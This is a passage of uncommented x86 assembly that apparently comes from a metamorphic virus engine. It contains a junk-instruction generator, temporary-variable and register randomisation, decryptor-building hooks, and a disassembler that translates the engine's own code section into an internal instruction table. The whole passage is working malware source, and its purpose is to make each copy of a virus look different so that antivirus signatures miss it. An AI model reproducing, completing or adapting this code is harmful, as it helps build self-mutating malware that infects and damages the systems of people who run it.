mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegImm
call Xp_GenOPMemReg
mov eax, [ebp+Xp_SrcRegister]
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
ret
Xp_MakeSET_WEIGHT endp
Xp_GetSpecialJcc proc
push ebx
call Random
mov ebx, eax
and eax, 0Eh
cmp eax, 8
jae @@Next
shr ebx, 1
@@Next: shr ebx, 1
and ebx, 1
add eax, ebx
add eax, 70h
pop ebx
ret
Xp_GetSpecialJcc endp
Xp_CopyMemoryReference proc
mov eax, [ebp+Xp_Mem_Index1]
mov [edi+1], eax
mov eax, [ebp+Xp_Mem_Index2]
mov [edi+2], eax
mov eax, [ebp+Xp_Mem_Addition]
mov [edi+3], eax
ret
Xp_CopyMemoryReference endp
Xp_InsertGarbage proc
call Random
and eax, 7
or eax, eax
jz @@MakeOneByter
cmp eax, 1
jz @@MakeMOVRegReg
cmp eax, 2
jz @@MakeANDs1
cmp eax, 3
jz @@MakeOR0
cmp eax, 4
jz @@MakeXOR0
cmp eax, 5
jz @@MakeADD0
cmp eax, 6
jz @@MakeCMPJcc
jmp Xp_InsertGarbage
@@MakeADD0:
xor eax, eax
mov [ebp+Xp_Operation], eax
@@MakeOP0:
xor eax, eax
mov [ebp+Xp_Immediate], eax
@@MakeOPx:
xor eax, eax
mov [edi+0Bh], eax
mov [edi+0Ch], esi
xor eax, eax
mov [ebp+Xp_8Bits], eax
@@MakeOPReg0:
call Random
and eax, 7
cmp eax, 4
jz @@MakeOPReg0
cmp eax, [ebp+TranslatedDeltaRegister]
jz @@MakeOPReg0
mov [ebp+Xp_Register], eax
call Xp_GenOPRegImm
ret
@@MakeOR0:
mov eax, 8
mov [ebp+Xp_Operation], eax
jmp @@MakeOP0
@@MakeXOR0:
mov eax, 30h
mov [ebp+Xp_Operation], eax
jmp @@MakeOP0
@@MakeANDs1:
mov eax, 20h
mov [ebp+Xp_Operation], eax
mov eax, -1
mov [ebp+Xp_Immediate], eax
jmp @@MakeOPx
@@MakeCMPJcc:
call Random
and eax, 7
cmp eax, 4
jz @@MakeADD0
cmp eax, [ebp+TranslatedDeltaRegister]
jz @@MakeADD0
mov [ebp+Xp_Register], eax
mov [ebp+Xp_SrcRegister], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov [edi+0Bh], eax
mov [edi+0Ch], esi
mov eax, 38h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegReg
call Xp_GetSpecialJcc
mov [ebp+Xp_Operation], eax
@@OtherLabel:
call Random
and eax, 01F8h
cmp eax, [ebp+NumberOfLabels]
jae @@OtherLabel
add eax, [ebp+LabelTable]
mov [ebp+Xp_Immediate], eax
call Xp_GenJcc_SingleJcc
ret
@@MakeMOVRegReg:
call Random
and eax, 7
cmp eax, 4
jz @@MakeMOVRegReg
cmp eax, [ebp+TranslatedDeltaRegister]
jz @@MakeMOVRegReg
mov [ebp+Xp_Register], eax
mov [ebp+Xp_SrcRegister], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov [edi+0Bh], eax
mov [edi+0Ch], esi
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegReg
ret
@@MakeOneByter:
call Random
and eax, 1
jz @@OnlyNOP
call Random
and eax, 0100h
add eax, 0F8FDh
jmp @@OtherOneByter
@@OnlyNOP: mov eax, 90FDh
@@OtherOneByter:
mov [edi], eax
xor eax, eax
mov [edi+0Bh], eax
mov [edi+0Ch], esi
add edi, 10h
call Random
and eax, 0Fh
or eax, eax
jz @@MakeOneByter
ret
Xp_InsertGarbage endp
Xp_IncreaseRecurseLevel proc
call Random
and eax, 1
jnz @@Close
mov eax, [ebp+Xp_RecurseLevel]
add eax, 1
mov [ebp+Xp_RecurseLevel], eax
@@Close:
ret
Xp_IncreaseRecurseLevel endp
Xp_RestoreOpAndDecreaseRecurseLevel proc
call Xp_RestoreOperation
Xp_RestoreOpAndDecreaseRecurseLevel endp
Xp_DecreaseRecurseLevel proc
call Random
and eax, 1
jnz @@Close
mov eax, [ebp+Xp_RecurseLevel]
sub eax, 1
mov [ebp+Xp_RecurseLevel], eax
@@Close:
ret
Xp_DecreaseRecurseLevel endp
Xp_GetTempVar proc
push edx
call Random
mov edx, eax
@@VariableCheck:
and edx, 1FFF8h
mov eax, [ebp+CreatingADecryptor]
or eax, eax
jz @@Normal1
and edx, 00FF8h
cmp edx, 20h
jb @@Add20
cmp edx, 0F00h
jb @@Normal1
xor edx, edx
@@Add20: add edx, 20h
@@Normal1: add edx, [ebp+VarMarksTable]
mov eax, [edx]
or eax, eax
jz @@VariableFound
sub edx, [ebp+VarMarksTable]
add edx, 8
jmp @@VariableCheck
@@VariableFound:
mov eax, 1
mov [edx], eax
sub edx, [ebp+VarMarksTable]
call Random
and eax, 3
add edx, eax
mov eax, [ebp+CreatingADecryptor]
or eax, eax
jz @@Normal2
add edx, [ebp+Decryptor_DATA_SECTION]
mov [ebp+Xp_Mem_Addition], edx
mov eax, 8
jmp @@Continue
@@Normal2: add edx, [ebp+New_DATA_SECTION]
mov [ebp+Xp_Mem_Addition], edx
mov eax, [ebp+DeltaRegister]
call Xpand_TranslateRegister
@@Continue: mov [ebp+Xp_Mem_Index1], eax
mov eax, 8
mov [ebp+Xp_Mem_Index2], eax
pop edx
ret
Xp_GetTempVar endp
Xp_SaveOperation proc
pop ebx
mov eax, [ebp+Xp_Operation]
push eax
mov eax, [ebp+Xp_Mem_Index1]
push eax
mov eax, [ebp+Xp_Mem_Index2]
push eax
mov eax, [ebp+Xp_Mem_Addition]
push eax
mov eax, [ebp+Xp_Register]
push eax
mov eax, [ebp+Xp_SrcRegister]
push eax
mov eax, [ebp+Xp_Immediate]
push eax
mov eax, [ebp+Xp_8Bits]
push eax
push ebx
ret
Xp_SaveOperation endp
Xp_RestoreOperation proc
pop ebx
pop eax
mov [ebp+Xp_8Bits], eax
pop eax
mov [ebp+Xp_Immediate], eax
pop eax
mov [ebp+Xp_SrcRegister], eax
pop eax
mov [ebp+Xp_Register], eax
pop eax
mov [ebp+Xp_Mem_Addition], eax
pop eax
mov [ebp+Xp_Mem_Index2], eax
pop eax
mov [ebp+Xp_Mem_Index1], eax
pop eax
mov [ebp+Xp_Operation], eax
push ebx
ret
Xp_RestoreOperation endp
;--------------------------------------------------------------------------------------
DecodeMemoryConstruction proc
mov eax, 00000808h
mov [edi+1], eax
xor eax, eax
mov [edi+3], eax
mov ebx, 1
mov eax, [edx]
and eax, 7
cmp eax, 4
jz @@ThirdOpcodeUsed
cmp eax, 5
jz @@DirectMemory
@@SetBaseRegister:
mov eax, [edx]
and eax, 7
push edx
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
pop edx
mov [edi+1], eax
mov eax, [edx]
and eax, 0C0h
or eax, eax
jz @@NoAddition
cmp eax, 40h
jz @@ByteAddition
@@DwordAddition:
add ebx, 4
mov eax, [edx+1]
jmp @@SetAddition
@@ByteAddition:
add ebx, 1
mov eax, [edx+1]
and eax, 0FFh
cmp eax, 7Fh
jbe @@SetAddition
add eax, 0FFFFFF00h
@@SetAddition:
mov [edi+3], eax
@@NoAddition:
ret
@@DirectMemory:
mov eax, [edx]
and eax, 0C0h
or eax, eax
jnz @@SetBaseRegister
jmp @@DwordAddition
@@ThirdOpcodeUsed:
add ebx, 1
mov eax, [edx+1]
and eax, 38h
shr eax, 3
cmp eax, 4
jz @@IgnoreScalarRegister
mov ecx, eax
mov eax, [edx+1]
and eax, 0C0h
or eax, ecx
push edx
mov edx, [edi+2]
and edx, 0FFFFFF00h
and eax, 0FFh
add eax, edx
pop edx
mov [edi+2], eax
@@IgnoreScalarRegister:
mov eax, [edx]
and eax, 0C0h
or eax, eax
jz @@EBPMeansDwordAddition
mov eax, [edx+1]
and eax, 7
push edx
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
pop edx
mov [edi+1], eax
mov eax, [edx]
and eax, 0C0h
cmp eax, 40h
jz @@ByteAddition2
@@DwordAddition2:
add ebx, 4
mov eax, [edx+2]
jmp @@SetAddition2
@@ByteAddition2:
add ebx, 1
mov eax, [edx+2]
and eax, 0FFh
cmp eax, 7Fh
jbe @@SetAddition2
add eax, 0FFFFFF00h
@@SetAddition2:
mov [edi+3], eax
ret
@@EBPMeansDwordAddition:
mov eax, [edx+1]
and eax, 7
cmp eax, 5
jz @@DwordAddition2
push edx
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
pop edx
mov [edi+1], eax
ret
DecodeMemoryConstruction endp
DisasmCode proc
xor eax, eax
mov [ebp+NumberOfLabels], eax
mov [ebp+NumberOfLabelsPost], eax
mov ecx, 80000h/4
mov edi, [ebp+PathMarksTable]
xor eax, eax
@@LoopInitializePathTable:
call Random
and eax, 0FCh
mov [edi], eax
add edi, 4
sub ecx, 1
or ecx, ecx
jnz @@LoopInitializePathTable
mov edi, [ebp+InstructionTable]
@@LoopTrace:
@@CheckCurrentLabel:
mov eax, esi
sub eax, [ebp+_CODE_SECTION]
sub eax, ebp
add eax, [ebp+PathMarksTable]
mov eax, [eax]
and eax, 0FFh
cmp eax, 1
jnz @@CheckIfFutureLabelArrived
mov edx, [ebp+InstructionTable]
@@CheckCurrEIP_001:
mov eax, [edx+0Ch]
cmp eax, esi
jz @@ItsTheCurrentEIP
add edx, 10h
jmp @@CheckCurrEIP_001
@@ItsTheCurrentEIP:
mov [edi+0Ch], esi
mov eax, [edi+0Bh]
and eax, 0FFFFFF00h
mov [edi+0Bh], eax
mov eax, 0E9h
mov [edi], eax
mov eax, esi
mov ebx, edx
call InsertLabel
mov [edi+1], edx
add edi, 10h
mov ecx, [ebp+NumberOfLabelsPost]
or ecx, ecx
jz @@FinDeTraduccion
mov ebx, [ebp+FutureLabelTable]
@@LoopCheckOtherFutureLabel:
mov eax, [ebx]
cmp eax, esi
jz @@OtherFutureLabelFound
@@LoopSearchOtherFutureLabel:
add ebx, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopCheckOtherFutureLabel
mov ecx, [ebp+NumberOfLabelsPost]
mov ebx, [ebp+FutureLabelTable]
@@LoopCheckOtherFutureLabel2:
mov eax, [ebx]
or eax, eax
jz @@LoopSearchOtherFutureLabel2
sub eax, ebp
sub eax, [ebp+_CODE_SECTION]
add eax, [ebp+PathMarksTable]
mov eax, [eax]
and eax, 0FFh
cmp eax, 1
jz @@ReleaseLabelsInThatAddress
@@LoopSearchOtherFutureLabel2:
add ebx, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopCheckOtherFutureLabel2
jmp @@GetEIPFromFutureLabelList
@@ReleaseLabelsInThatAddress:
push ebx
push ecx
mov esi, [ebx]
call ReleaseFutureLabels
pop ecx
pop ebx
jmp @@LoopSearchOtherFutureLabel2
@@OtherFutureLabelFound:
mov eax, [ebx+4]
mov [eax+1], edx
xor eax, eax
mov [ebx], eax
jmp @@LoopSearchOtherFutureLabel
@@CheckIfFutureLabelArrived:
mov eax, [edi+0Bh]
and eax, 0FFFFFF00h
mov [edi+0Bh], eax
call ReleaseFutureLabels
@@DefineInstr:
mov [edi+0Ch], esi
mov ebx, esi
sub ebx, [ebp+_CODE_SECTION]
sub ebx, ebp
add ebx, [ebp+PathMarksTable]
mov eax, [ebx]
or eax, 1
mov [ebx], eax
mov eax, [esi]
and eax, 0FFh
cmp eax, 3Fh
jbe @@GenericOpcode
cmp eax, 47h
jbe @@Op_INC
cmp eax, 4Fh
jbe @@Op_DEC
cmp eax, 5Fh
jbe @@Op_PUSHPOP
cmp eax, 68h
jz @@Op_PUSHValue
cmp eax, 6Ah
jz @@Op_PUSHSignedValue
cmp eax, 70h
jb @@DefineInstr_00
cmp eax, 7Fh
jbe @@Jcc
@@DefineInstr_00:
cmp eax, 80h
jb @@DefineInstr_01
cmp eax, 83h
jbe @@GenericOpcode2
@@DefineInstr_01:
cmp eax, 84h
jz @@Gen_8b_MemReg
cmp eax, 85h
jz @@Gen_32b_MemReg
cmp eax, 8Bh
jbe @@GenericOpcode
cmp eax, 8Dh
jz @@LEA
cmp eax, 8Fh
jz @@POPMem
cmp eax, 90h
jz @@NOP
cmp eax, 0A8h
jz @@TESTALValue
cmp eax, 0A9h
jz @@TESTEAXValue
cmp eax, 0B0h
jb @@DefineInstr_02
cmp eax, 0B7h
jbe @@MOVReg8Value
cmp eax, 0BFh
jbe @@MOVRegValue
@@DefineInstr_02:
cmp eax, 0C0h
jz @@BitShifting8
cmp eax, 0C1h
jz @@BitShifting32
cmp eax, 0C3h
jz @@RET
cmp eax, 0C6h
jz @@MOVMem8Value
cmp eax, 0C7h
jz @@MOVMem32Value
cmp eax, 0D0h
jz @@BitShifting8
cmp eax, 0D1h
jz @@BitShifting32
cmp eax, 0E8h
jz @@CALL
cmp eax, 0E9h
jz @@JMP
cmp eax, 0EBh
jz @@JMP8
cmp eax, 0F5h
jz @@NOP
cmp eax, 0F6h
jz @@SomeNotVeryCommon8
cmp eax, 0F7h
jz @@SomeNotVeryCommon32
cmp eax, 0FDh
jbe @@NOP
cmp eax, 0FEh
jz @@INCDECMem8
cmp eax, 0FFh
jz @@INCDECPUSHMem32
mov eax, 0FFh
@@SetOneByteInstruction:
mov [edi], eax
add edi, 10h
inc esi
@@ContinueDissasembly:
jmp @@LoopTrace
@@GenericOpcode:
and eax, 7
cmp eax, 3
jbe @@Gen_NormalOpcode
cmp eax, 4
jz @@Gen_UsingAL
cmp eax, 5
jz @@Gen_UsingEAX
mov eax, [esi]
and eax, 0FFh
cmp eax, 0Fh
jz @@Opcode0F
jmp @@SetOneByteInstruction
@@Gen_NormalOpcode:
or eax, eax
jz @@Gen_8b_MemReg
cmp eax, 1
jz @@Gen_32b_MemReg
cmp eax, 2
jz @@Gen_8b_RegMem
@@Gen_32b_RegMem:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen_32b_ReglReg
mov eax, [esi]
and eax, 0FFh
cmp eax, 8Bh
jnz @@Gen_32b_RegMem_0
mov eax, 40h+2
jmp @@Gen_GenMem
@@Gen_32b_RegMem_0:
and eax, 38h
add eax, 2
@@Gen_GenMem:
mov edx, [edi]
and edx, 0FFFFFF00h
and eax, 0FFh
add eax, edx
mov [edi], eax
mov eax, [esi+1]
and eax, 38h
shr eax, 3
mov [edi+7], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
jmp @@NextInstruction
@@Gen_32b_MemReg:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen_32b_lRegReg
mov eax, [esi]
and eax, 0FFh
cmp eax, 85h
jnz @@Gen_32b_MemReg_0
mov eax, 48h+3
jmp @@Gen_GenMem
@@Gen_32b_MemReg_0:
@@Gen_32b_MemReg_1:
cmp eax, 89h
jnz @@Gen_32b_MemReg_2
mov eax, 40h+3
jmp @@Gen_GenMem
@@Gen_32b_MemReg_2:
and eax, 38h
add eax, 3
jmp @@Gen_GenMem
@@Gen_32b_ReglReg:
call GenOp_SetRegReg
@@Gen_GenReglReg:
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov eax, [esi+1]
and eax, 38h
shr eax, 3
mov [edi+7], eax
add esi, 2
jmp @@NextInstruction
@@Gen_32b_lRegReg:
call GenOp_SetRegReg
@@Gen_GenlRegReg:
mov eax, [esi+1]
and eax, 7
mov [edi+7], eax
mov eax, [esi+1]
and eax, 38h
shr eax, 3
mov [edi+1], eax
add esi, 2
jmp @@NextInstruction
@@Gen_8b_RegMem:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen_8b_ReglReg
mov eax, [esi]
and eax, 0FFh
cmp eax, 8Ah
jnz @@Gen_8b_RegMem_0
mov eax, 40h+82h
jmp @@Gen_GenMem
@@Gen_8b_RegMem_0:
and eax, 38h
add eax, 82h
jmp @@Gen_GenMem
@@Gen_8b_MemReg:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen_8b_lRegReg
mov eax, [esi]
and eax, 0FFh
cmp eax, 84h
jnz @@Gen_8b_MemReg_0
mov eax, 48h+83h
jmp @@Gen_GenMem
@@Gen_8b_MemReg_0:
@@Gen_8b_MemReg_1:
cmp eax, 88h
jnz @@Gen_8b_MemReg_2
mov eax, 40h+83h
jmp @@Gen_GenMem
@@Gen_8b_MemReg_2:
and eax, 38h
add eax, 83h
jmp @@Gen_GenMem
@@Gen_8b_lRegReg:
call GenOp_SetRegReg
mov eax, [edi]
add eax, 80h
mov [edi], eax
jmp @@Gen_GenlRegReg
@@Gen_8b_ReglReg:
call GenOp_SetRegReg
mov eax, [edi]
add eax, 80h
mov [edi], eax
jmp @@Gen_GenReglReg
@@Gen_UsingAL:
mov eax, [esi]
and eax, 38h
add eax, 80h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
xor eax, eax
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 7Fh
jbe @@Gen_UsingAL_01
add eax, 0FFFFFF00h
@@Gen_UsingAL_01:
add esi, 2
jmp @@Gen_SetValue
@@Gen_UsingEAX:
mov eax, [esi]
and eax, 38h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
mov eax, [esi+1]
add esi, 5
@@Gen_SetValue:
mov [edi+7], eax
xor eax, eax
mov [edi+1], eax
jmp @@NextInstruction
@@Op_INC: and eax, 7
mov [edi+1], eax
xor eax, eax
jmp @@Op_GenINCDEC
@@Op_DEC: and eax, 7
mov [edi+1], eax
mov eax, 28h
@@Op_GenINCDEC:
mov edx, [edi]
and edx, 0FFFFFF00h
and eax, 0FFh
add eax, edx
mov [edi], eax
mov eax, 1
mov [edi+7], eax
add esi, 1
jmp @@NextInstruction
@@Op_PUSHPOP: and eax, 7
mov [edi+1], eax
mov eax, [esi]
and eax, 58h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
add esi, 1
jmp @@NextInstruction
@@Op_PUSHValue:
mov [edi], eax
mov eax, [esi+1]
mov [edi+7], eax
add esi, 5
jmp @@NextInstruction
@@Op_PUSHSignedValue:
mov eax, 68h
mov [edi], eax
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 7Fh
jbe @@Op_PUSHSignedValue_01
add eax, 0FFFFFF00h
@@Op_PUSHSignedValue_01:
mov [edi+7], eax
add esi, 2
jmp @@NextInstruction
@@GenericOpcode2:
and eax, 1
or eax, eax
jz @@Gen2_8b
@@Gen2_32b:
mov eax, [esi+1]
and eax, 38h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
mov eax, [esi]
and eax, 2
or eax, eax
jnz @@Gen2_Gen_Signed
@@Gen32Value:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen2_32b_Register
mov eax, [edi]
add eax, 4
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
mov eax, [esi+1]
sub esi, ebx
add esi, 3
jmp @@Gen2_Gen_Memory
@@Gen2_32b_Register:
mov eax, [esi+2]
mov [edi+7], eax
mov eax, [esi+1]
add esi, 6
jmp @@Gen2_Gen_Register
@@Gen2_8b:
mov eax, [esi+1]
and eax, 38h
add eax, 80h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
@@Gen2_Gen_Signed:
@@Gen8Value:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@Gen2_8b_Register
mov eax, [edi]
add eax, 4
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
xor eax, eax
add esi, ebx
mov eax, [esi+1]
sub esi, ebx
and eax, 0FFh
cmp eax, 7Fh
jbe @@Gen8Value_01
add eax, 0FFFFFF00h
@@Gen8Value_01:
@@Gen2_Gen_Memory:
mov [edi+7], eax
add esi, ebx
add esi, 2
jmp @@NextInstruction
@@Gen2_8b_Register:
mov eax, [esi+2]
and eax, 0FFh
cmp eax, 7Fh
jbe @@Gen2_8b_Register_01
add eax, 0FFFFFF00h
@@Gen2_8b_Register_01:
mov [edi+7], eax
mov eax, [esi+1]
add esi, 3
@@Gen2_Gen_Register:
and eax, 7
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+1], eax
jmp @@NextInstruction
@@LEA: mov eax, 0FCh
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
mov eax, [esi+1]
and eax, 38h
shr eax, 3
mov [edi+7], eax
add esi, ebx
add esi, 1
jmp @@NextInstruction
@@POPMem: mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@POPMem_butReg
mov eax, 59h
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
jmp @@NextInstruction
@@POPMem_butReg:
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov eax, 58h
mov edx, [edi]
and edx, 0FFFFFF00h
add eax, edx
mov [edi], eax
add esi, 2
jmp @@NextInstruction
@@NOP: mov eax, 0FFh
mov [edi], eax
add esi, 1
jmp @@NextInstruction
@@TESTALValue:
mov eax, [esi+1]
and eax, 0FFh
mov ecx, eax
mov eax, 0C8h
add esi, 2
@@TESTxAxValue:
mov [edi], eax
xor eax, eax
mov [edi+1], eax
mov [edi+7], ecx
jmp @@NextInstruction
@@TESTEAXValue:
mov ecx, [esi+1]
mov eax, 48h
add esi, 5
jmp @@TESTxAxValue
@@MOVRegValue:
mov eax, 40h
mov [edi], eax
mov ecx, [esi+1]
mov eax, [esi]
add esi, 5
@@MOVRegValue_Common:
and eax, 7
mov [edi+1], eax
mov [edi+7], ecx
jmp @@NextInstruction
@@MOVReg8Value:
mov eax, 0C0h
mov [edi], eax
mov eax, [esi+1]
and eax, 0FFh
mov ecx, eax
mov eax, [esi]
add esi, 2
jmp @@MOVRegValue_Common
@@BitShifting32:
mov eax, 0F0h
@@BitShifting_Common:
mov [edi], eax
mov eax, [esi+1]
and eax, 38h
mov edx, [edi+8]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+8], eax
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@BS32_Reg
mov eax, [edi]
add eax, 1
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
@@BS32_Common:
mov eax, [esi]
and eax, 0FFh
cmp eax, 0D0h
jb @@BS32_GetNumber
mov eax, 1
sub esi, 1
jmp @@BS32_SetNumber
@@BS32_GetNumber:
add esi, ebx
mov eax, [esi+1]
sub esi, ebx
@@BS32_SetNumber:
and eax, 1Fh
mov edx, [edi+7]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+7], eax
add esi, ebx
add esi, 2
jmp @@NextInstruction
@@BS32_Reg:
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov ebx, 1
jmp @@BS32_Common
@@BitShifting8:
mov eax, 0F2h
jmp @@BitShifting_Common
@@MOVMem8Value:
mov eax, 0C4h
mov [edi], eax
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@MOVMem8_RegValue
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
@@MOVMem8Value_Common:
mov eax, [esi]
and eax, 0FFh
cmp eax, 7Fh
jbe @@MOVMem8Value_01
add eax, 0FFFFFF00h
@@MOVMem8Value_01:
mov [edi+7], eax
add esi, 1
jmp @@NextInstruction
@@MOVMem8_RegValue:
mov eax, 0C0h
mov [edi], eax
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
add esi, 2
jmp @@MOVMem8Value_Common
@@MOVMem32Value:
mov eax, 44h
mov [edi], eax
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@MOVMem32_RegValue
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
mov eax, [esi]
mov [edi+7], eax
add esi, 4
jmp @@NextInstruction
@@MOVMem32_RegValue:
mov eax, 40h
mov [edi], eax
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov eax, [esi+2]
mov [edi+7], eax
add esi, 6
jmp @@NextInstruction
@@SomeNotVeryCommon8:
mov eax, [esi+1]
and eax, 38h
or eax, eax
jz @@TEST8Value
shr eax, 1
add eax, 0DAh
@@SNVC_Gen: mov [edi], eax
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@NOTNEGReg8
mov eax, [edi]
add eax, 1
mov [edi], eax
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
jmp @@NextInstruction
@@NOTNEGReg8:
mov eax, [esi+1]
and eax, 7
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+1], eax
add esi, 2
jmp @@NextInstruction
@@SomeNotVeryCommon32:
mov eax, [esi+1]
and eax, 38h
or eax, eax
jz @@TEST32Value
shr eax, 1
add eax, 0D8h
jmp @@SNVC_Gen
@@TEST8Value:
mov eax, 0C8h
mov [edi], eax
jmp @@Gen8Value
@@TEST32Value:
mov eax, 48h
mov [edi], eax
jmp @@Gen32Value
@@INCDECMem8:
mov eax, [esi+1]
and eax, 38h
or eax, eax
jz @@INCMem8
@@DECMem8: mov eax, 0ACh
@@INCDECMem8_Next:
mov [edi], eax
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@INCDECReg8
@@INCDECPUSH_Gen:
mov edx, esi
add edx, 1
call DecodeMemoryConstruction
add esi, ebx
add esi, 1
mov eax, 1
mov [edi+7], eax
mov eax, [edi]
and eax, 0FFh
cmp eax, 0EBh
jnz @@NextInstruction
add edi, 10h
jmp @@GetEIPFromFutureLabelList
@@INCDECReg8:
mov eax, [edi]
sub eax, 4
mov [edi], eax
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov eax, 1
mov [edi+7], eax
add esi, 2
jmp @@NextInstruction
@@INCMem8: mov eax, 84h
jmp @@INCDECMem8_Next
@@INCDECPUSHMem32:
mov eax, [esi+1]
and eax, 38h
or eax, eax
jz @@INCMem32
cmp eax, 08h
jz @@DECMem32
cmp eax, 10h
jz @@CALLMem32
cmp eax, 20h
jz @@JMPMem32
@@PUSHMem32:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@PUSHMem32_Reg
mov eax, 51h
mov [edi], eax
jmp @@INCDECPUSH_Gen
@@PUSHMem32_Reg:
mov eax, 50h
@@INCDECPUSH_GenMem32_Reg:
mov [edi], eax
mov eax, [esi+1]
and eax, 7
mov [edi+1], eax
mov eax, 1
mov [edi+7], eax
add esi, 2
mov eax, [edi]
and eax, 0FFh
cmp eax, 0EDh
jnz @@NextInstruction
add edi, 10h
jmp @@GetEIPFromFutureLabelList
@@INCMem32:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@INCReg32
mov eax, 4
jmp @@INCDECMem8_Next
@@INCReg32:
xor eax, eax
jmp @@INCDECPUSH_GenMem32_Reg
@@DECMem32:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@DECReg32
mov eax, 2Ch
jmp @@INCDECMem8_Next
@@DECReg32:
mov eax, 28h
jmp @@INCDECPUSH_GenMem32_Reg
@@CALLMem32:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@CALLMem32_Reg
mov eax, 0EAh
mov [edi], eax
jmp @@INCDECPUSH_Gen
@@CALLMem32_Reg:
mov eax, 0ECh
jmp @@INCDECPUSH_GenMem32_Reg
@@JMPMem32:
mov eax, [esi+1]
and eax, 0C0h
cmp eax, 0C0h
jz @@JMPMem32_Reg
mov eax, 0EBh
mov [edi], eax
jmp @@INCDECPUSH_Gen
@@JMPMem32_Reg:
mov eax, 0EDh
jmp @@INCDECPUSH_GenMem32_Reg
@@NextInstruction:
add edi, 10h
jmp @@ContinueDissasembly
@@RET: mov eax, 0FEh
mov [edi], eax
inc esi
add edi, 10h
jmp @@GetEIPFromFutureLabelList
@@JMP8: mov eax, [esi+1]
and eax, 0FFh
cmp eax, 7Fh
jbe @@JMP8_01
add eax, 0FFFFFF00h
@@JMP8_01:
add eax, 2
add eax, esi
jmp @@JMP_Next01
@@JMP: mov eax, [esi+1]
add eax, 5
add eax, esi
@@JMP_Next01:
mov ebx, [ebp+InstructionTable]
cmp ebx, edi
jz @@NoInstructions
@@FindDestinyInTable:
cmp [ebx+0Ch], eax
jz @@SetLabel
add ebx, 10h
cmp ebx, edi
jnz @@FindDestinyInTable
@@NoInstructions:
mov ecx, 0FFh
mov [edi], ecx
add edi, 10h
mov esi, eax
jmp @@LoopTrace
@@SetLabel:
mov ecx, 0E9h
mov [edi], ecx
mov edx, esi
mov [edi+0Ch], edx
add edi, 10h
push eax
mov eax, [esi]
and eax, 0FFh
mov ecx, eax
pop eax
cmp ecx, 0EBh
jz @@Add2ToEIP
add esi, 3
@@Add2ToEIP:
add esi, 2
call InsertLabel
mov [edi+1-10h], edx
@@GetEIPFromFutureLabelList:
mov ecx, [ebp+NumberOfLabelsPost]
or ecx, ecx
jz @@FinDeTraduccion
mov ebx, [ebp+FutureLabelTable]
@@LoopCheckForNewEIP:
mov eax, [ebx]
or eax, eax
jnz @@GetNewEIP
add ebx, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopCheckForNewEIP
jmp @@FinDeTraduccion
@@GetNewEIP:
mov esi, [ebx]
jmp @@LoopTrace
@@Opcode0F:
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 80h
jb @@Op0F_Next00
cmp eax, 8Fh
jbe @@Jcc32
@@Op0F_Next00:
cmp eax, 0B6h
jz @@Op0F_MOVZX
add esi, 2
jmp @@DefineInstr
@@Op0F_MOVZX:
mov eax, 0F8h
mov [edi], eax
mov eax, [esi+2]
and eax, 38h
